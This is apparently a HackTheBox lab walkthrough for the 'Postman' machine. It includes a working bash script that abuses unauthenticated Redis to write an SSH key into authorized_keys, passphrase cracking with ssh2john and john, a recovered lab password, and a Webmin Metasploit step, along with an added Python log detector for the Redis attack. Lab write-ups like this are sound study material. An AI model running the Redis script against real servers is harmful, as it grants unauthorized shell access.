Postman – HackTheBox Machine Walkthrough
The Postman machine from HTB sits in the easy category, but the method is still difficult if you are not using Metasploit directly.
Nmap Scan
The Nmap scan showed ports 22, 80, 6379/TCP (Redis) and 10000/TCP open. You need to scan all ports, otherwise port 6379 will not be displayed.
Redis Enumeration & Exploit
After the Nmap scan, ports 6379 and 10000 looked interesting. After some work, I found that port 10000 serves the Webmin login page. Port 6379 is Redis, so I searched Google for Redis and found one interesting link:
Redis Enumeration:- https://book.hacktricks.xyz/pentesting/6379-pentesting-redis
Using these commands you can make a script or run them directly.
Redis Script
#!/bin/bash
rm ~/.ssh/id*
ssh-keygen -t rsa
(echo -e "\n\n"; cat ~/.ssh/id_rsa.pub; echo -e "\n\n") > foo.txt
redis-cli -h 10.10.10.160 flushall
cat foo.txt | redis-cli -h 10.10.10.160 -x set crackit
redis-cli -h 10.10.10.160 config set dir /var/lib/redis/.ssh/
redis-cli -h 10.10.10.160 config set dbfilename "authorized_keys"
redis-cli -h 10.10.10.160 save
ssh -i ~/.ssh/id_rsa redis@10.10.10.160
Source: https://github.com/Tatik07/Hackthebox/blob/master/Redis_exploit.sh
After running that script I get a shell as the redis user. In the home directory we can see the user name is Matt.
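As an added example (not part of the original walkthrough or the linked script), this is one way a defender could spot the command sequence above in redis-cli monitor output: a CONFIG SET of dir or dbfilename aimed at SSH key material, followed by SAVE. The log lines, timestamps and the client address 10.10.14.7 are constructed.

```python
import re

# Constructed `redis-cli monitor` output for illustration; not captured from a real host.
SAMPLE = r'''
1584260000.100 [0 127.0.0.1:40000] "config" "set" "maxmemory" "256mb"
1584260000.200 [0 127.0.0.1:40000] "save"
1584260001.101 [0 10.10.14.7:50112] "flushall"
1584260001.350 [0 10.10.14.7:50114] "set" "crackit" "\n\nssh-rsa AAAA(constructed) user@host\n\n"
1584260001.612 [0 10.10.14.7:50116] "config" "set" "dir" "/var/lib/redis/.ssh/"
1584260001.870 [0 10.10.14.7:50118] "CONFIG" "SET" "dbfilename" "authorized_keys"
1584260002.104 [0 10.10.14.7:50120] "save"
'''

LINE = re.compile(r'^(\d+\.\d+) \[\d+ (\S+):\d+\] (.*)$')   # ts, client IP, quoted args
ARG = re.compile(r'"((?:[^"\\]|\\.)*)"')                    # one quoted argument, escapes kept
RISKY_DIR = re.compile(r'/\.ssh/?$')
RISKY_FILES = {"authorized_keys"}


def detect(lines):
    """Alert on SAVE/BGSAVE issued while CONFIG SET has aimed the dump at SSH key material."""
    state = {}    # CONFIG is server-wide: parameter -> (value, client IP that set it)
    alerts = []
    for line in lines:
        m = LINE.match(line.strip())
        if not m:
            continue                      # blank lines, the "OK" banner, non-TCP clients
        ts, ip, rest = m.groups()
        args = ARG.findall(rest)
        cmd = [a.lower() for a in args[:3]]   # Redis command names are case-insensitive
        if cmd[:2] == ["config", "set"] and len(args) >= 4 and cmd[2] in ("dir", "dbfilename"):
            state[cmd[2]] = (args[3], ip)
        elif cmd[:1] in (["save"], ["bgsave"]):
            d, d_ip = state.get("dir", ("", None))
            f, f_ip = state.get("dbfilename", ("", None))
            if RISKY_DIR.search(d) or f in RISKY_FILES:
                alerts.append({"ts": ts, "dir": d, "dbfilename": f,
                               "sources": sorted({ip, d_ip, f_ip} - {None})})
    return alerts


if __name__ == "__main__":
    for alert in detect(SAMPLE.splitlines()):
        print(alert)
```

Each redis-cli call in the script opens a new connection, so the detector correlates by client IP rather than by IP and port.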
Privilege Escalation
After running the LinEnum script and searching some directories, I found an SSH RSA key in the /opt directory.
-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: DES-EDE3-CBC,73E9CEFBCCF5287C
-----END RSA PRIVATE KEY-----
The key is encrypted, so we need to crack its passphrase: convert the key with the ssh2john.py tool, then crack the result using john with rockyou.txt.
# python3 /usr/share/john/ssh2john.py key.txt > loll
# john --wordlist=(rockyou location) (filename)
The password is computer2008 & the user is Matt.
Webmin Exploit Using Metasploit
There are many exploits for Webmin. After using the packageup remote exploit, I got root access.
Postman HackTheBox Walkthrough, reviewed by F1R3_CR4CK3R on March 15, 2020